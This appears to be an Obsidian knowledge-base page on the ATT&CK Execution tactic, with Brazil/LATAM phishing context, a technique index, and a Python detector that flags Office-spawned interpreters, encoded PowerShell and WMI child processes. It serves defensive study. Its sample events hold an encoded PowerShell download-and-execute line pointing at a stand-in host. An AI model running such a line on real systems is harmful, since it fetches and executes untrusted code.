# Execution

```mermaid
graph TB
    A["💥 Execution Vector"] --> B["📜 Scripts and Interpreters<br/>T1059 - PowerShell / Bash"]
    A --> C["🛠️ System Services<br/>T1569 - Service Execution"]
    A --> D["👤 User Interaction<br/>T1204 - Malicious File/Link"]
    A --> E["⏰ Scheduling<br/>T1053 - Scheduled Task"]
    A --> F["🔌 System APIs<br/>T1106 - Native API"]
    B --> G["🚀 Payload Executed<br/>Next Stages of the Attack"]
    C --> G
    D --> G
    E --> G
    F --> G
```

> [!info] Overview
> The Execution tactic (TA0002) covers the techniques used to run malicious code on a compromised or targeted system. It is usually the second stage after Initial Access: the attacker needs to run a payload to establish a foothold, collect data or set up persistence.
> **Techniques:** 47 techniques and sub-techniques covering script interpreters, native APIs, system services, task scheduling and execution through user interaction.
> **LATAM highlight:** PowerShell and VBA scripts embedded in Office documents are the main execution vectors in phishing campaigns against Brazilian organizations.

> [!warning] Brazil/LATAM Context
> **T1059 (Command and Scripting Interpreter)** is the most prevalent execution technique in attacks against Brazil, especially **PowerShell (T1059.001)** and **Visual Basic (T1059.005)** in phishing campaigns. Groups such as **Blind Eagle** and distributors of banking RATs abuse **User Execution (T1204)** with malicious Word/Excel documents disguised as invoices (notas fiscais), boletos and Receita Federal notices to trick Brazilian users. **WMI (T1047)** is also widely used for lateral movement in corporate Windows environments.
> **47 techniques** · Execution of malicious code on the target system: scripts, commands, system APIs.
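The three techniques the callout singles out (Office-launched interpreters, T1204.002; encoded PowerShell, T1059.001; and process creation through WMI, T1047) can be checked from ordinary process-creation telemetry. The detector below is an added example and not part of the original page or the vault: it runs over constructed process-creation events using Sysmon EID 1 field names (`Image`, `ParentImage`, `CommandLine`, `ProcessId`), decodes `-EncodedCommand` blobs so the analyst sees the real script, and tags each match with its technique ID. The sample events, the image lists and the helper names are assumptions made for this example.

```python
import base64
import binascii
import re

# Office parents that indicate user-driven execution (T1204.002) when they spawn
# an interpreter, interpreters worth flagging (T1059), and the WMI provider host
# that fronts local/remote WMI process creation (T1047). Lists are constructed
# for this example; tune them to your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
WMI_HOST = "wmiprvse.exe"

# -EncodedCommand and the abbreviations PowerShell accepts, then a base64 blob.
ENC_RE = re.compile(r"(?i)[-/](?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it
    (base64 over UTF-16LE). Used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command,
    otherwise None. A malformed blob returns None instead of raising."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def detect_execution(events):
    """Map process-creation events to ATT&CK Execution techniques.
    Each event is a dict with Image, ParentImage, CommandLine and ProcessId
    (Sysmon EID 1 field names). Returns one finding dict per match."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        pid = ev.get("ProcessId")
        # Office application spawning a script/command interpreter:
        # the classic macro-laden "nota fiscal" / boleto lure.
        if parent in OFFICE_PARENTS and image in INTERPRETERS:
            findings.append({"technique": "T1204.002", "pid": pid,
                             "detail": f"{parent} spawned {image}"})
        # PowerShell launched with an encoded command: surface the payload.
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append({"technique": "T1059.001", "pid": pid,
                                 "detail": f"encoded command: {decoded[:80]}"})
        # Any child of the WMI provider host was created through WMI
        # (Win32_Process.Create), whether from this host or a remote one.
        if parent == WMI_HOST:
            findings.append({"technique": "T1047", "pid": pid,
                             "detail": f"WmiPrvSE spawned {image}: {cmd[:80]}"})
    return findings


# Constructed sample events (not real telemetry): a macro stager, a
# WMI-driven command, and a benign interactive PowerShell session.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/nf.ps1')")},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"},
    {"ProcessId": 4300,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for f in detect_execution(SAMPLE_EVENTS):
        print(f["technique"], f["pid"], f["detail"])
```

Run stand-alone, the first event produces both a T1204.002 and a T1059.001 finding (one for the Office parent, one for the decoded downloader), the second produces T1047, and the benign session produces nothing. The `WmiPrvSE.exe` parent check is a hunting signal rather than a stand-alone alert: management tooling also creates processes through WMI, so pair it with the originating user, the child command line and whether the WMI call came from a remote host.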
%%
```dataview
TABLE WITHOUT ID link(file.link, title) AS "Name"
FROM "ttp/techniques/execution"
WHERE type = "technique"
SORT title ASC
```
%%
<!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Note", title AS "Name" FROM "ttp/techniques/execution" WHERE type = "technique" SORT title ASC -->
<!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Note", title AS "Name" FROM "ttp/techniques/execution" WHERE type = "technique" SORT title ASC -->
| Note | Name |
| --- | --- |
| [[t1047-windows-management-instrumentation\|T1047 - Windows Management Instrumentation]] | T1047 - Windows Management Instrumentation |
| [[t1053-scheduled-task-job\|T1053 - Scheduled Task/Job]] | T1053 - Scheduled Task/Job |
| [[t1053-scheduled-taskjob\|T1053 - Scheduled Task/Job]] | T1053 - Scheduled Task/Job |
| [[t1053-002-at\|T1053.002 - At]] | T1053.002 - At |
| [[t1053-003-cron\|T1053.003 - Cron]] | T1053.003 - Cron |
| [[t1053-005-scheduled-task\|T1053.005 - Scheduled Task]] | T1053.005 - Scheduled Task |
| [[t1053-006-systemd-timers\|T1053.006 - Systemd Timers]] | T1053.006 - Systemd Timers |
| [[t1053-007-container-orchestration-job\|T1053.007 - Container Orchestration Job]] | T1053.007 - Container Orchestration Job |
| [[t1059-command-and-scripting-interpreter\|T1059 - Command and Scripting Interpreter]] | T1059 - Command and Scripting Interpreter |
| [[t1059-command-scripting-interpreter\|T1059 - Command and Scripting Interpreter]] | T1059 - Command and Scripting Interpreter |
| [[t1059-001-powershell\|T1059.001 - PowerShell]] | T1059.001 - PowerShell |
| [[t1059-002-applescript\|T1059.002 - AppleScript]] | T1059.002 - AppleScript |
| [[t1059-003-windows-command-shell\|T1059.003 - Windows Command Shell]] | T1059.003 - Windows Command Shell |
| [[t1059-004-unix-shell\|T1059.004 - Unix Shell]] | T1059.004 - Unix Shell |
| [[t1059-005-visual-basic\|T1059.005 - Visual Basic]] | T1059.005 - Visual Basic |
| [[t1059-006-python\|T1059.006 - Python]] | T1059.006 - Python |
| [[t1059-007-javascript\|T1059.007 - JavaScript]] | T1059.007 - JavaScript |
| [[t1059-008-network-device-cli\|T1059.008 - Network Device CLI]] | T1059.008 - Network Device CLI |
| [[t1059-009-cloud-api\|T1059.009 - Cloud API]] | T1059.009 - Cloud API |
| [[t1059-010-autohotkey-autoit\|T1059.010 - AutoHotKey & AutoIT]] | T1059.010 - AutoHotKey & AutoIT |
| [[t1059-011-lua\|T1059.011 - Lua]] | T1059.011 - Lua |
| [[t1059-012-hypervisor-cli\|T1059.012 - Hypervisor CLI]] | T1059.012 - Hypervisor CLI |
| [[t1059-013-container-cliapi\|T1059.013 - Container CLI/API]] | T1059.013 - Container CLI/API |
| [[t1072-software-deployment-tools\|T1072 - Software Deployment Tools]] | T1072 - Software Deployment Tools |
| [[t1106-native-api\|T1106 - Native API]] | T1106 - Native API |
| [[t1129-shared-modules\|T1129 - Shared Modules]] | T1129 - Shared Modules |
| [[t1203-exploitation-client-execution\|T1203 - Exploitation for Client Execution]] | T1203 - Exploitation for Client Execution |
| [[t1203-exploitation-for-client-execution\|T1203 - Exploitation for Client Execution]] | T1203 - Exploitation for Client Execution |
| [[t1204-user-execution\|T1204 - User Execution]] | T1204 - User Execution |
| [[t1204-001-malicious-link\|T1204.001 - Malicious Link]] | T1204.001 - Malicious Link |
| [[t1204-002-malicious-file\|T1204.002 - Malicious File]] | T1204.002 - Malicious File |
| [[t1204-003-malicious-image\|T1204.003 - Malicious Image]] | T1204.003 - Malicious Image |
| [[t1204-004-malicious-copy-and-paste\|T1204.004 - Malicious Copy and Paste]] | T1204.004 - Malicious Copy and Paste |
| [[t1204-005-malicious-library\|T1204.005 - Malicious Library]] | T1204.005 - Malicious Library |
| [[t1559-inter-process-communication\|T1559 - Inter-Process Communication]] | T1559 - Inter-Process Communication |
| [[t1559-001-component-object-model\|T1559.001 - Component Object Model]] | T1559.001 - Component Object Model |
| [[t1559-002-dynamic-data-exchange\|T1559.002 - Inter-Process Communication: Dynamic Data Exchange]] | T1559.002 - Inter-Process Communication: Dynamic Data Exchange |
| [[t1559-003-xpc-services\|T1559.003 - XPC Services]] | T1559.003 - XPC Services |
| [[t1569-system-services\|T1569 - System Services]] | T1569 - System Services |
| [[t1569-001-launchctl\|T1569.001 - Launchctl]] | T1569.001 - Launchctl |
| [[t1569-002-service-execution\|T1569.002 - Service Execution]] | T1569.002 - Service Execution |
| [[t1569-003-systemctl\|T1569.003 - Systemctl]] | T1569.003 - Systemctl |
| [[t1609-container-administration-command\|T1609 - Container Administration Command]] | T1609 - Container Administration Command |
| [[t1648-serverless-execution\|T1648 - Serverless Execution]] | T1648 - Serverless Execution |
| [[t1651-cloud-administration-command\|T1651 - Cloud Administration Command]] | T1651 - Cloud Administration Command |
| [[ttp/techniques/execution/t1671-cloud-application-integration.md\|T1671 - Cloud Application Integration]] | T1671 - Cloud Application Integration |
| [[t1674-input-injection\|T1674 - Input Injection]] | T1674 - Input Injection |
| [[t1675-esxi-administration-command\|T1675 - ESXi Administration Command]] | T1675 - ESXi Administration Command |
| [[t1677-poisoned-pipeline-execution\|T1677 - Poisoned Pipeline Execution]] | T1677 - Poisoned Pipeline Execution |
<!-- SerializedQuery END -->

---

**Navigation:** [[_techniques|Techniques]] · [[_tactics|Tactics]] · [[_procedures|Procedures]]